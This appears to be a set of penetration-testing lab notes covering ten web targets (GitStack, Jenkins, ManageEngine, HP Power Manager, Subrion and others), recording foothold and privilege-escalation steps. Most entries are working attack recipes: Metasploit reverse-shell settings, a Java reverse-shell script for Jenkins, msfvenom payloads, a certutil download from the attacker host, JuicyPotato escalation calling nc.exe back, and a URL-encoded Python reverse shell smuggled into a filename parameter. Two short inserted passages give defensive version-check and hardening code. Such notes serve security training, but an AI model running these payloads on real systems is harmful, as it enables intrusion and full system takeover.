Web 3

Web 21: GitStack

Target: Windows

Foothold: RCE

  • HTTP 404 shows the web root
  • Default credentials to login to GitStack
  • searchsploit shows this software is vulnerable to RCE
  • Use metasploit module windows/http/gitstack_rce

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 22: Apache Struts

Target: Windows

Foothold: REST RCE

  • Used metasploit module exploit/multi/http/struts2_rest_xstream
set rhost <target>
set rport <tcp port>
set targeturi </struts2-rest-showcase/orders/id#>
set lhost <kali ip>
set lport <tcp port>
set payload cmd/windows/reverse_powershell
run

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 23: Zeroshell

Target: Windows

Foothold: RCE

  • Run Metasploit console and use module linux/http/49096
set rhosts <target>
set rport <tcp port>
set srvport 80
set lhost <kali ip>
set lport <tcp port>
run

Privilege Escalation: Vulnerable service is running as Root


Web 24: WingFTP Server

Target: Windows

Foothold: RCE

  • Start Metasploit console and use exploit/windows/ftp/wing_ftp_admin_exec
set username admin
set password admin
set rhosts <target>
set lhost <kali ip>
set lport <tcp port>
run

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 25: Jenkins Server

Target: Windows

Foothold: RCE

  • http://$target/jenkins/script
  • Had anonymous access to Groovy script execution
  • Used a Java reverse shell payload
String host="kali-ip";
int port=tcp-port;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();
  • Start a listener
  • Run the Groovy script

Privilege Escalation: SeImpersonatePrivilege

  • Download to Kali: JuicyPotato.exe
  • Copy /usr/share/windows-resources/binaries/nc.exe to current directory
  • Transfer to target
  • Start a netcat listener
  • On the target create a .bat file that will call nc.exe
# From a CMD prompt (no quotes around the payload)
C:\Users\username\Desktop> echo C:\path\to\nc.exe <kali-ip> <tcp-port> > pwn.bat

# From a PowerShell prompt (payload is quoted)
PS C:\Users\username\Desktop> 'C:\path\to\nc.exe <kali-ip> <tcp-port>' > pwn.bat
  • Get a valid CLSID to use for the potato attack
# From a CMD prompt
C:\Users\username\Desktop> powershell -nop -c "New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null; Get-ItemProperty HKCR:\clsid\* | Where-Object AppId -ne $null | Select-Object '(default)', PSChildName"
  • Run the potato attack (used BITS CLSID)
JuicyPotato.exe -p .\pwn.bat -l 8080 -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
Testing {69AD4AEE-51BE-439b-A92C-86AE490E8B30} 8080
......
[+] authresult 0
{69AD4AEE-51BE-439b-A92C-86AE490E8B30};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Web 26: ManageEngine Applications Manager (Build 14700)

Target: Windows

Foothold: RCE

  • Click on Admin tab
  • Actions > Execute program
  • Create a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=$kaliPort -f exe -o shell.exe

Action 1: Upload reverse shell

  • Display Name: Download file
  • Script Location: Local Server
  • Program to Execute:
certutil.exe -urlcache -split -f http://<kali-ip>/shell.exe C:\Windows\Temp\shell.exe
  • Directory to Execute Program: C:\Windows\System32
  • Click Create Action
  • Start a web server to host the file
  • Execute the action

Action 2: Run the reverse shell

  • Display Name: Reverse shell
  • Script Location: Local Server
  • Program to Execute: shell.exe
  • Directory to Execute Program: C:\Windows\Temp
  • Click Create Action
  • Start a listener to catch the shell
  • Execute the action

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 27: HP Power Manager 4.2 (Build 7)

Target: Windows

Foothold: Buffer Overflow and RCE

  • This version of HP Power Manager is vulnerable to CVE-2009-2585
  • Manual exploit: https://raw.githubusercontent.com/n4xh4ck5/CVE2009-2585_HP_Power_Manager_BoF/master/CVE2009-2585_HP_Power_Manager_BoF.py
  • Generate new shellcode and replace what's in the exploit
msfvenom -p windows/shell_reverse_tcp LHOST=$kaliIP LPORT=$kaliPort EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' -e x86/alpha_mixed --platform windows -f python -v buf
  • Start a listener
  • Run exploit
python2 CVE2009-2585_HP_Power_Manager_BoF.py $target

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 28: ManageEngine ServiceDesk Plus 7.6.0

Target: Windows

Foothold: Authenticated Arbitrary File Upload and Path Traversal

  • This version of this product is vulnerable to path traversal and file upload
  • Can upload a WAR payload to Java server and cause it to deploy
  • Create the WAR file
msfvenom -p java/shell/reverse_tcp LHOST=$kaliIP LPORT=$kaliPort -f war -o pwnz.war
  • Start a listener
sudo msfconsole
use exploit/multi/handler
set LHOST kaliIP
set LPORT kaliPort
set payload java/shell/reverse_tcp
run
  • Run the exploit
python3 CVE-2014-5301.py $target $kaliPort administrator administrator pwnz.war

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 29: Subrion CMS 4.2.1

Target: Linux

Foothold: File Upload and RCE

python3 49876.py -u 'http://base.uri/panel/' -l 'admin' -p 'admin'

Privilege Escalation: Cron Job

  • Output contents of /etc/crontab and see recurring job running as root calling script in /opt
  • Script is readable. It calls exiftool and loads filenames with keyword jpg from /var/www/html/subrion/uploads
  • I have write access as www-data and even if I didn't, I could upload via the Subrion control panel
  • Run apt list --installed | grep exiftool and find it is vulnerable to CVE-2021-22204
  • Google search site:github.com -metasploit CVE-2021-22204
  • Nice tool here to automate exploit generation
  • Modify variables in script
  • Make the .jpg payload by running exploit.py
  • Upload the file to the target
  • Start a listener and wait for the cron job to load the file
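From the defender's side, the root cron job hands attacker-controllable uploads to ExifTool, so the first thing to verify on such a host is whether the installed package sits in the range affected by CVE-2021-22204 (7.44 through 12.23, fixed in 12.24). The check below is an added example, not a tool from these notes; the `apt list --installed` lines it parses are constructed.

```python
"""Flag an installed exiftool package whose upstream version falls in the
range affected by CVE-2021-22204 (7.44 through 12.23, inclusive)."""
import re
from typing import List, Tuple

# Constructed sample of `apt list --installed` output (not captured from the lab host).
SAMPLE_APT_LIST = """\
Listing... Done
libimage-exiftool-perl/now 11.88-1 all [installed,local]
exiftool/now 12.16+dfsg-2 all [installed]
perl/stable,now 5.28.1-6 amd64 [installed]
"""

# Inclusive affected range per the CVE-2021-22204 advisory.
AFFECTED_MIN = (7, 44)
AFFECTED_MAX = (12, 23)


def upstream_version(debian_version: str) -> Tuple[int, int]:
    """Reduce a Debian version such as '1:12.16+dfsg-2' to (major, minor)."""
    # Strip the epoch ('1:'), the Debian revision ('-2'), then any '+dfsg' suffix.
    upstream = debian_version.split(":", 1)[-1].split("-", 1)[0].split("+", 1)[0]
    m = re.match(r"^(\d+)\.(\d+)", upstream)
    if not m:
        raise ValueError(f"unparseable version: {debian_version!r}")
    return int(m.group(1)), int(m.group(2))


def is_affected(debian_version: str) -> bool:
    """True when the upstream version is inside the affected range."""
    return AFFECTED_MIN <= upstream_version(debian_version) <= AFFECTED_MAX


def find_vulnerable_exiftool(apt_list_output: str) -> List[Tuple[str, str]]:
    """Return (package, version) pairs for exiftool packages in the affected range."""
    hits = []
    for line in apt_list_output.splitlines():
        # apt line format: name/suite[,suite...]  version  arch  [flags]
        m = re.match(r"^(\S+?)/\S+\s+(\S+)\s+\S+\s+\[", line)
        if not m:
            continue
        pkg, ver = m.group(1), m.group(2)
        if "exiftool" in pkg and is_affected(ver):
            hits.append((pkg, ver))
    return hits
```

A patched ExifTool only closes this one CVE; the larger weakness is a root cron job parsing files that a web user can write, which should run as an unprivileged account.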

Web 30: Angular Web App

Target: Linux

Foothold: RCE

  • Examine web page source
  • Sources a main.js, inspect it
  • main.js makes a call to /api subdirectory
  • gobuster enum /api and find /api/users and /api/settings
  • Get /api/users and get JSON array of usernames
  • Get /api/settings and get JSON of user settings
  • Use PowerShell to elevate application privileges via HTTP POST
$r = iwr http://$target -SessionVariable ws
$login = iwr http://$target/login -Method Post -Body @{username = 'dev-acct'; password = 'password'} -WebSession $ws
iwr http://$target/api/settings -Method Post -Body @{'color-theme' = 'light' ; lang = 'en' ;admin = $true} -WebSession $ws
  • Now that I am an admin, there is an input textbox
  • Input box does not sanitize inputs
  • Inject a reverse shell
http://$target/api/backup?filename=;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.64%22,53));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;
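Both API weaknesses above have straightforward server-side fixes. The following is an added example, not the lab app's own backend (which the notes never show): the mass-assignment settings update and the shell-built backup command beside allowlisted and argv-based versions.

```python
"""Vulnerable and hardened forms of the two endpoints abused above:
/api/settings accepting an `admin` field from the client, and
/api/backup splicing `filename` into a shell command line."""
import re
from typing import Dict, List

# Allowlist of fields a user may change about themselves; `admin` is deliberately absent.
CLIENT_SETTABLE = {"color-theme", "lang"}
# Backup names: alphanumeric start, then a short run of safe characters only.
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def update_settings_vulnerable(user: Dict, body: Dict) -> Dict:
    """Mass assignment: every posted key is written straight into the user record,
    so POSTing admin=true grants admin."""
    user.update(body)
    return user


def update_settings_hardened(user: Dict, body: Dict) -> Dict:
    """Only allowlisted keys are copied; privilege fields never come from the client."""
    for key, value in body.items():
        if key in CLIENT_SETTABLE:
            user[key] = value
    return user


def backup_command_vulnerable(filename: str) -> str:
    """Command string meant for shell=True: a ';' in filename ends the tar
    command and starts a second one, which is the injection used above."""
    return f"tar czf /var/backups/{filename} /var/www/app"


def backup_argv_hardened(filename: str) -> List[str]:
    """Validate the name against a strict pattern and return an argv list to pass
    to subprocess.run(argv) with no shell, so metacharacters are never interpreted."""
    if not SAFE_FILENAME.fullmatch(filename) or not filename.endswith(".tar.gz"):
        raise ValueError("invalid backup filename")
    return ["tar", "czf", f"/var/backups/{filename}", "/var/www/app"]
```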

Privilege Escalation: Vulnerable service is running as root